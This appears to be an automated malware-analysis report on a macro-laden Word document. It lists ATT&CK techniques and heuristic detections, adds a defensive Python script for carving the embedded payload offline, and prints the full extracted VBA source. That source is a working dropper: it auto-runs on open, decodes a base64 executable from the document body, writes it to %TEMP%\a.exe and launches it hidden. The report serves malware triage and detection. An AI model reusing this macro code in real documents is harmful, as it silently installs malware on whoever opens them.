Verdict: MALICIOUS
Risk Score: 278
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1140 Deobfuscate or Obfuscate Malicious Code
T1053.005 Scheduled Task/Job
T1071.001 Web Protocols
The sample contains VBA macros, including an autoopen subroutine that runs as soon as the document is opened in Word with macros enabled. The macro reads the document's own third paragraph (ActiveDocument.Paragraphs(3).Range.Text), strips the first and last character with Mid(text, 2, Len(text) - 2), base64-decodes the remainder with a hand-rolled decoder, writes the bytes to Environ("tmp") & "\a.exe" (the per-user %TEMP% directory, e.g. C:\Users\<user>\AppData\Local\Temp\a.exe, not C:\Users\Public) and launches the file directly with Shell filename, vbHide, so no console or window is shown. The payload is carried inside the document body rather than fetched from the network, which makes this dropper functionality; the mshta.exe string flagged below is not used anywhere in the extracted macro code.
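As an added example (not part of the analyzer output or of the sample's own code), the following Python reproduces the macro's decode path offline so the embedded payload can be carved and hashed without opening the document: it mirrors the Mid(text, 2, Len(text) - 2) trim, applies the same acceptance rules as the macro's Base64Decode (length a multiple of 4, standard alphabet only), checks the result for an MZ/PE header and reports the drop path the macro builds. The paragraph text is constructed for the example: a null-padded MZ/PE header stub stands in for the real payload, the leading delimiter character is an assumption, and the trailing carriage return is the paragraph mark that Word's Range.Text always includes. It also measures the longest run of 'A' in the encoded text against the longest run of null bytes in the decoded payload, which is the relationship behind the heap-spray heuristic's 0x41 run reported further down.

```python
"""Added example: offline re-implementation of the dropper's decode path.
Not the analyzer's code and not the sample's code. The macro on this page
reads ActiveDocument.Paragraphs(3).Range.Text, drops the first and last
character, base64-decodes the rest, writes it to Environ("tmp") & "\\a.exe"
and calls Shell. Everything below that stands in for document content is
CONSTRUCTED for the example."""
import base64
import binascii
import hashlib
import re
import struct


def build_fake_pe() -> bytes:
    """Constructed stand-in payload: 'MZ', e_lfanew at 0x3C pointing to
    'PE\\0\\0' at 0x80, null-padded the way a real header is. Not executable."""
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x80)   # 64 bytes
    dos += b"\x00" * (0x80 - len(dos))                      # pad up to e_lfanew
    return dos + b"PE\x00\x00" + b"\x00" * 60               # 192 bytes total


def build_paragraph_text(payload: bytes) -> str:
    """Constructed Word paragraph: a leading delimiter (assumption), the
    base64 body, and the trailing vbCr that Paragraph.Range.Text carries."""
    return " " + base64.b64encode(payload).decode("ascii") + "\r"


def macro_mid_trim(text: str) -> str:
    """Mid(text, 2, Len(text) - 2): drop the first and the last character."""
    return text[1:-1]


def decode_payload(paragraph_text: str) -> bytes:
    """Same acceptance rules as the macro's Base64Decode: length must be a
    multiple of 4 and only the standard alphabet is allowed; error otherwise."""
    enc = macro_mid_trim(paragraph_text)
    if len(enc) % 4:
        raise ValueError("Length of Base64 encoded input string is not a multiple of 4.")
    try:
        return base64.b64decode(enc, validate=True)
    except binascii.Error as exc:
        raise ValueError("Illegal character in Base64 encoded data.") from exc


def looks_like_pe(blob: bytes) -> bool:
    """'MZ' at offset 0 and 'PE\\0\\0' at e_lfanew (little-endian DWORD at 0x3C)."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def longest_run(seq, pattern) -> int:
    """Length of the longest match of pattern (e.g. r"A+" or rb"\\x00+")."""
    return max((len(m) for m in re.findall(pattern, seq)), default=0)


def triage(paragraph_text: str) -> dict:
    """Carve the payload and report what a reviewer wants before any dynamic run."""
    enc = macro_mid_trim(paragraph_text)
    blob = decode_payload(paragraph_text)
    return {
        "size": len(blob),
        "sha256": hashlib.sha256(blob).hexdigest(),
        "is_pe": looks_like_pe(blob),
        # Drop path exactly as the macro builds it. Environ("tmp") is the
        # per-user %TEMP% (C:\Users\<user>\AppData\Local\Temp), never Public.
        "drop_path": r"%TEMP%\a.exe",
        # Heap-spray heuristic caveat: three 0x00 bytes encode to "AAAA", so
        # null padding in a PE header shows up as a long run of 0x41 in the
        # document text. The two measurements below rise and fall together.
        "longest_A_run_in_text": longest_run(enc, r"A+"),
        "longest_null_run_in_payload": longest_run(blob, rb"\x00+"),
    }


if __name__ == "__main__":
    sample = build_paragraph_text(build_fake_pe())
    for key, value in triage(sample).items():
        print(f"{key}: {value}")
```

For a real case, pull the third paragraph's text out of the document with a text extractor of your choice, feed it to triage(), and hash the carved file before it goes anywhere near a sandbox; if the decode raises, the paragraph was not the carrier and the macro would have failed in the same way.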
Heuristics (9)
- ClamAV: Ole2.Macro.Agent-9858864-1 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Ole2.Macro.Agent-9858864-1
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Potential Shell call in VBA [critical] OLE_VBA_SHELL: Potential Shell call in VBA. Matched lines in script:
  Shell filename, vbHide
  End Sub
- AutoOpen macro [low] OLE_VBA_AUTOOPEN: AutoOpen macro. Matched lines in script:
  Sub autoopen()
  Dim handle As Long
- Environ() call (env variable access) [low] OLE_VBA_ENVIRON: Environ() call (env variable access). Matched lines in script:
  filename = Environ("tmp") & "\a.exe"
  handle = FreeFile
- Heap-spray pattern detected [high] SC_HEAP_SPRAY: Repeated 0x41 (A) bytes found. Attempted x86 opcode disassembly: offsets 0x00000F33 through 0x00000F92, 96 consecutive bytes of 41 (inc ecx). Caveat: in a document that carries a base64-encoded executable in its body, long runs of 0x41 are the expected encoding of null padding (three 0x00 bytes encode to "AAAA"), so a PE header stored as text looks like a NOP sled to a byte-level scanner. Check the run against the decoded payload before treating it as evidence of a heap spray rather than as another sign of the embedded payload.
- Reference to mshta.exe [high] SC_STR_MSHTA: Reference to mshta.exe. String match only; the extracted macro source and its p-code contain no mshta invocation.
- Password-protected archive handoff [high] SE_PASSWORD_ARCHIVE_LURE: Document gives password instructions for an archive or attachment, a lure often used to keep payloads encrypted until after gateway scanning
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML namespace present in any Office file with drawing content and is not an indicator on its own.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13123 bytes | 19361d433310cd3b4415a42fb6a42af277bf45a7c6b7cda9f987fa2be5aa1eb8 |
Script preview (first 1,000 lines of the extracted script; the decoded VBA source is followed by the p-code disassembly olevba appends as comments)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Map1(0 To 63) As Byte
Private Map2(0 To 127) As Byte
Sub autoopen()
Dim handle As Long
Dim filename As String
Dim data() As Byte
Dim text As String
Init
filename = Environ("tmp") & "\a.exe"
handle = FreeFile
text = GetEmbedded()
data = Base64Decode(Mid(text, 2, Len(text) - 2))
Open filename For Binary Access Write As #handle
Put #handle, 1, data
Close #handle
Shell filename, vbHide
End Sub
Private Sub Init()
Dim c As Integer, i As Integer
' set Map1
i = 0
For c = Asc("A") To Asc("Z"): Map1(i) = c: i = i + 1: Next
For c = Asc("a") To Asc("z"): Map1(i) = c: i = i + 1: Next
For c = Asc("0") To Asc("9"): Map1(i) = c: i = i + 1: Next
Map1(i) = Asc("+"): i = i + 1
Map1(i) = Asc("/"): i = i + 1
' set Map2
For i = 0 To 127: Map2(i) = 255: Next
For i = 0 To 63: Map2(Map1(i)) = i: Next
End Sub
Private Function ConvertStringToBytes(ByVal s As String) As Byte()
Dim b1() As Byte: b1 = s
Dim l As Long: l = (UBound(b1) + 1) \ 2
If l = 0 Then ConvertStringToBytes = b1: Exit Function
Dim b2() As Byte
ReDim b2(0 To l - 1) As Byte
Dim p As Long
For p = 0 To l - 1
Dim c As Long: c = b1(2 * p) + 256 * CLng(b1(2 * p + 1))
If c >= 256 Then c = Asc("?")
b2(p) = c
Next
ConvertStringToBytes = b2
End Function
Public Function Base64Decode(ByVal s As String) As Byte()
Dim IBuf() As Byte: IBuf = ConvertStringToBytes(s)
Dim v As Byte: v = IBuf(UBound(IBuf))
Dim ILen As Long: ILen = UBound(IBuf) + 1
If ILen Mod 4 <> 0 Then Err.Raise vbObjectError, , "Length of Base64 encoded input string is not a multiple of 4."
Do While ILen > 0
If IBuf(ILen - 1) <> Asc("=") Then Exit Do
ILen = ILen - 1
Loop
Dim OLen As Long: OLen = (ILen * 3) \ 4
Dim Out() As Byte
ReDim Out(0 To OLen - 1) As Byte
Dim ip As Long
Dim op As Long
Do While ip < ILen
Dim i0 As Byte: i0 = IBuf(ip): ip = ip + 1
Dim i1 As Byte: i1 = IBuf(ip): ip = ip + 1
Dim i2 As Byte: If ip < ILen Then i2 = IBuf(ip): ip = ip + 1 Else i2 = Asc("A")
Dim i3 As Byte: If ip < ILen Then i3 = IBuf(ip): ip = ip + 1 Else i3 = Asc("A")
If i0 > 127 Or i1 > 127 Or i2 > 127 Or i3 > 127 Then _
Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."
Dim b0 As Byte: b0 = Map2(i0)
Dim b1 As Byte: b1 = Map2(i1)
Dim b2 As Byte: b2 = Map2(i2)
Dim b3 As Byte: b3 = Map2(i3)
If b0 > 63 Or b1 > 63 Or b2 > 63 Or b3 > 63 Then _
Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."
Dim o0 As Byte: o0 = (b0 * 4) Or (b1 \ &H10)
Dim o1 As Byte: o1 = ((b1 And &HF) * &H10) Or (b2 \ 4)
Dim o2 As Byte: o2 = ((b2 And 3) * &H40) Or b3
Out(op) = o0: op = op + 1
If op < OLen Then Out(op) = o1: op = op + 1
If op < OLen Then Out(op) = o2: op = op + 1
Loop
Base64Decode = Out
End Function
Private Function GetEmbedded() As String
GetEmbedded = ActiveDocument.Paragraphs(3).Range.text
End Function
' Processing file: /tmp/qstore_2mf7fgql
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 11070 bytes
' Line #0:
' Dim (Private)
' LitDI2 0x0000
' LitDI2 0x003F
' VarDefn Map1 (As Byte) 0x0017
' Line #1:
' Dim (Private)
' LitDI2 0x0000
' LitDI2 0x007F
' VarDefn Map2 (As Byte)
' Line #2:
' Line #3:
' FuncDefn (Sub autoopen())
' Line #4:
' Dim
' VarDefn handle (As Long)
' Line #5:
' Dim
' VarDefn filename (As String)
' Line #6:
' Dim
' VarDefn data (As Byte)
' Line #7:
' Dim
' VarDefn Text (As String)
' Line #8:
' ArgsCall Init 0x0000
' Line #9:
' Line #10:
' LitStr 0x0003 "tmp"
' ArgsLd Environ 0x0001
' LitStr 0x0006 "\a.exe"
' Concat
' St filename
' Line #11:
' Ld FreeFile
' St handle
' Line #12:
' ArgsLd GetEmbedded 0x0000
' St Text
' Line #13:
' Ld Text
' LitDI2 0x0002
' Ld Text
' FnLen
' LitDI2 0x0002
' Sub
' ArgsLd Mid 0x0003
' ArgsLd Base64Decode 0x0001
' St data
' Line #14:
' Ld filename
' Ld handle
' Sharp
' LitDefault
' Open (For Binary Access Write)
' Line #15:
' Ld handle
' Sharp
' LitDI2 0x0001
' Ld data
' PutRec
' Line #16:
' Ld handle
' Sharp
' Close 0x0001
' Line #17:
' Line #18:
' Ld filename
' Ld vbHide
' ArgsCall Shell 0x0002
' Line #19:
' EndSub
' Line #20:
' Line #21:
' FuncDefn (Private Sub Init())
' Line #22:
' Dim
' VarDefn c (As Integer)
' VarDefn i (As Integer)
' Line #23:
' QuoteRem 0x0003 0x0009 " set Map1"
' Line #24:
' LitDI2 0x0000
' St i
' Line #25:
' StartForVariable
' Ld c
' EndForVariable
' LitStr 0x0001 "A"
' ArgsLd Asc 0x0001
' LitStr 0x0001 "Z"
' ArgsLd Asc 0x0001
' For
' BoS 0x0000
' Ld c
' Ld i
' ArgsSt Map1 0x0001
' BoS 0x0000
' Ld i
' LitDI2 0x0001
' Add
' St i
' BoS 0x0000
' StartForVariable
' Next
' Line #26:
' StartForVariable
' Ld c
' EndForVariable
' LitStr 0x0001 "a"
' ArgsLd Asc 0x0001
' LitStr 0x0001 "z"
' ArgsLd Asc 0x0001
' For
' BoS 0x0000
' Ld c
' Ld i
' ArgsSt Map1 0x0001
' BoS 0x0000
' Ld i
' LitDI2 0x0001
' Add
' St i
' BoS 0x0000
' StartForVariable
' Next
' Line #27:
' StartForVariable
' Ld c
' EndForVariable
' LitStr 0x0001 "0"
' ArgsLd Asc 0x0001
' LitStr 0x0001 "9"
' ArgsLd Asc 0x0001
' For
' BoS 0x0000
' Ld c
' Ld i
' ArgsSt Map1 0x0001
' BoS 0x0000
' Ld i
' LitDI2 0x0001
' Add
' St i
' BoS 0x0000
' StartForVariable
' Next
' Line #28:
' LitStr 0x0001 "+"
' ArgsLd Asc 0x0001
' Ld i
' ArgsSt Map1 0x0001
' BoS 0x0000
' Ld i
' LitDI2 0x0001
' Add
' St i
' Line #29:
' LitStr 0x0001 "/"
' ArgsLd Asc 0x0001
' Ld i
' ArgsSt Map1 0x0001
' BoS 0x0000
' Ld i
' LitDI2 0x0001
' Add
' St i
' Line #30:
' QuoteRem 0x0003 0x0009 " set Map2"
' Line #31:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0000
' LitDI2 0x007F
' For
' BoS 0x0000
' LitDI2 0x00FF
' Ld i
' ArgsSt Map2 0x0001
' BoS 0x0000
' StartForVariable
' Next
' Line #32:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0000
' LitDI2 0x003F
' For
' BoS 0x0000
' Ld i
' Ld i
' ArgsLd Map1 0x0001
' ArgsSt Map2 0x0001
' BoS 0x0000
' StartForVariable
' Next
' Line #33:
' EndSub
' Line #34:
' Line #35:
' FuncDefn (Private Function ConvertStringToBytes(ByVal s As String, id_FFFE As ) As Append)
' Line #36:
' Dim
' VarDefn b1 (As Byte)
' BoS 0x0000
' Ld s
' St b1
' Line #37:
' Dim
' VarDefn l (As Long)
' BoS 0x0000
' Ld b1
' FnUBound 0x0000
' LitDI2 0x0001
' Add
' Paren
' LitDI2 0x0002
' IDiv
' St l
' Line #38:
' Ld l
' LitDI2 0x0000
' Eq
' If
' BoSImplicit
' Ld b1
' St ConvertStringToBytes
' BoS 0x0000
' ExitFunc
' EndIf
' Line #39:
' Dim
' VarDefn b2 (As Byte)
' Line #40:
' LitDI2 0x0000
' Ld l
' LitDI2 0x0001
' Sub
' RedimAs b2 0x0001 (As Byte)
' Line #41:
' Dim
' VarDefn p (As Long)
' Line #42:
' StartForVariable
' Ld p
' EndForVariable
' LitDI2 0x0000
' Ld l
' LitDI2 0x0001
' Sub
' For
' Line #43:
' Dim
' VarDefn c (As Long)
' BoS 0x0000
' LitDI2 0x0002
' Ld p
' Mul
' ArgsLd b1 0x0001
' LitDI2 0x0100
' LitDI2 0x0002
' Ld p
' Mul
' LitDI2 0x0001
' Add
' ArgsLd b1 0x0001
' Coerce (Lng)
' Mul
' Add
' St c
' Line #44:
' Ld c
' LitDI2 0x0100
' Ge
' If
' BoSImplicit
' LitStr 0x0001 "?"
' ArgsLd Asc 0x0001
' St c
' EndIf
' Line #45:
' Ld c
' Ld p
' ArgsSt b2 0x0001
' Line #46:
' StartForVariable
' Next
' Line #47:
' Ld b2
' St ConvertStringToBytes
' Line #48:
' EndFunc
' Line #49:
' Line #50:
' FuncDefn (Public Function Base64Decode(ByVal s As String, id_FFFE As ) As Append)
' Line #51:
' Dim
' VarDefn IBuf (As Byte)
' BoS 0x0000
' Ld s
' ArgsLd ConvertStringToBytes 0x0001
' St IBuf
' Line #52:
' Dim
' VarDefn v (As Byte)
' BoS 0x0000
' Ld IBuf
' FnUBound 0x0000
' ArgsLd IBuf 0x0001
' St v
' Line #53:
' Dim
' VarDefn ILen (As Long)
' BoS 0x0000
' Ld IBuf
' FnUBound 0x0000
' LitDI2 0x0001
' Add
' St ILen
' Line #54:
' Line #55:
' Ld ILen
' LitDI2 0x0004
' Mod
' LitDI2 0x0000
' Ne
' If
' BoSImplicit
' Ld vbObjectError
' ParamOmitted
' LitStr 0x003D "Length of Base64 encoded input string is not a multiple of 4."
' Ld Err
' ArgsMemCall Raise 0x0003
' EndIf
' Line #56:
' Ld ILen
' LitDI2 0x0000
' Gt
' DoWhile
' Line #57:
' Ld ILen
' LitDI2 0x0001
' Sub
' ArgsLd IBuf 0x0001
' LitStr 0x0001 "="
' ArgsLd Asc 0x0001
' Ne
' If
' BoSImplicit
' ExitDo
' EndIf
' Line #58:
' Ld ILen
' LitDI2 0x0001
' Sub
' St ILen
' Line #59:
' Loop
' Line #60:
' Dim
' VarDefn OLen (As Long)
' BoS 0x0000
' Ld ILen
' LitDI2 0x0003
' Mul
' Paren
' LitDI2 0x0004
' IDiv
' St OLen
' Line #61:
' Dim
' VarDefn Out (As Byte)
' Line #62:
' LitDI2 0x0000
' Ld OLen
' LitDI2 0x0001
' Sub
' RedimAs Out 0x0001 (As Byte)
' Line #63:
' Dim
' VarDefn ip (As Long)
' Line #64:
' Dim
' VarDefn op (As Long)
' Line #65:
' Ld ip
' Ld ILen
' Lt
' DoWhile
' Line #66:
' Dim
' VarDefn i0 (As Byte)
' BoS 0x0000
' Ld ip
' ArgsLd IBuf 0x0001
' St i0
' BoS 0x0000
' Ld ip
' LitDI2 0x0001
' Add
' St ip
' Line #67:
' Dim
' VarDefn i1 (As Byte)
' BoS 0x0000
' Ld ip
' ArgsLd IBuf 0x0001
' St i1
' BoS 0x0000
' Ld ip
' LitDI2 0x0001
' Add
' St ip
' Line #68:
' Dim
' VarDefn i2 (As Byte)
' BoS 0x0000
' Ld ip
' Ld ILen
' Lt
' If
' BoSImplicit
' Ld ip
' ArgsLd IBuf 0x0001
' St i2
' BoS 0x0000
' Ld ip
' LitDI2 0x0001
' Add
' St ip
' Else
' BoSImplicit
' LitStr 0x0001 "A"
' ArgsLd Asc 0x0001
' St i2
' EndIf
' Line #69:
' Dim
' VarDefn i3 (As Byte)
' BoS 0x0000
' Ld ip
' Ld ILen
' Lt
' If
' BoSImplicit
' Ld ip
' ArgsLd IBuf 0x0001
' St i3
' BoS 0x0000
' Ld ip
' LitDI2 0x0001
' Add
' St ip
' Else
' BoSImplicit
' LitStr 0x0001 "A"
' ArgsLd Asc 0x0001
' St i3
' EndIf
' Line #70:
' LineCont 0x0004 11 00 09 00
' Ld i0
' LitDI2 0x007F
' Gt
' Ld i1
' LitDI2 0x007F
' Gt
' Or
' Ld i2
' LitDI2 0x007F
' Gt
' Or
' Ld i3
' LitDI2 0x007F
' Gt
' Or
' If
' BoSImplicit
' Ld vbObjectError
' ParamOmitted
' LitStr 0x0029 "Illegal character in Base64 encoded data."
' Ld Err
' ArgsMemCall Raise 0x0003
' EndIf
' Line #71:
' Dim
' VarDefn b0 (As Byte)
' BoS 0x0000
' Ld i0
' ArgsLd Map2 0x0001
' St b0
' Line #72:
' Dim
' VarDefn b1 (As Byte)
' BoS 0x0000
' Ld i1
' ArgsLd Map2 0x0001
' St b1
' Line #73:
' Dim
' VarDefn b2 (As Byte)
' BoS 0x0000
' Ld i2
' ArgsLd Map2 0x0001
' St b2
' Line #74:
' Dim
' VarDefn b3 (As Byte)
' BoS 0x0000
' Ld i3
' ArgsLd Map2 0x0001
' St b3
' Line #75:
' LineCont 0x0004 11 00 09 00
' Ld b0
' LitDI2 0x003F
' Gt
' Ld b1
' LitDI2 0x003F
' Gt
' Or
' Ld b2
' LitDI2 0x003F
' Gt
' Or
' Ld b3
' LitDI2 0x003F
' Gt
' Or
' If
' BoSImplicit
' Ld vbObjectError
' ParamOmitted
' LitStr 0x0029 "Illegal character in Base64 encoded data."
' Ld Err
' ArgsMemCall Raise 0x0003
' EndIf
' Line #76:
' Dim
' VarDefn o0 (As Byte)
' BoS 0x0000
' Ld b0
' LitDI2 0x0004
' Mul
' Paren
' Ld b1
' LitHI2 0x0010
' IDiv
' Paren
' Or
' St o0
' Line #77:
' Dim
' VarDefn o1 (As Byte)
' BoS 0x0000
' Ld b1
' LitHI2 0x000F
' And
' Paren
' LitHI2 0x0010
' Mul
' Paren
' Ld b2
' LitDI2 0x0004
' IDiv
' Paren
' Or
' St o1
' Line #78:
' Dim
' VarDefn o2 (As Byte)
' BoS 0x0000
' Ld b2
' LitDI2 0x0003
' And
' Paren
' LitHI2 0x0040
' Mul
' Paren
' Ld b3
' Or
' St o2
' Line #79:
' Ld o0
' Ld op
' ArgsSt Out 0x0001
' BoS 0x0000
' Ld op
' LitDI2 0x0001
' Add
' St op
' Line #80:
' Ld op
' Ld OLen
' Lt
' If
' BoSImplicit
' Ld o1
' Ld op
' ArgsSt Out 0x0001
' BoS 0x0000
' Ld op
' LitDI2 0x0001
' Add
' St op
' EndIf
' Line #81:
' Ld op
' Ld OLen
' Lt
' If
' BoSImplicit
' Ld o2
' Ld op
' ArgsSt Out 0x0001
' BoS 0x0000
' Ld op
' LitDI2 0x0001
' Add
' St op
' EndIf
' Line #82:
' Loop
' Line #83:
' Ld Out
' St Base64Decode
' Line #84:
' EndFunc
' Line #85:
' Line #86:
' FuncDefn (Private Function GetEmbedded(id_FFFE As String) As String)
' Line #87:
' LitDI2 0x0003
' Ld ActiveDocument
' ArgsMemLd Paragraphs 0x0001
' MemLd Range
' MemLd Text
' St GetEmbedded
' Line #88:
' EndFunc
' Line #89: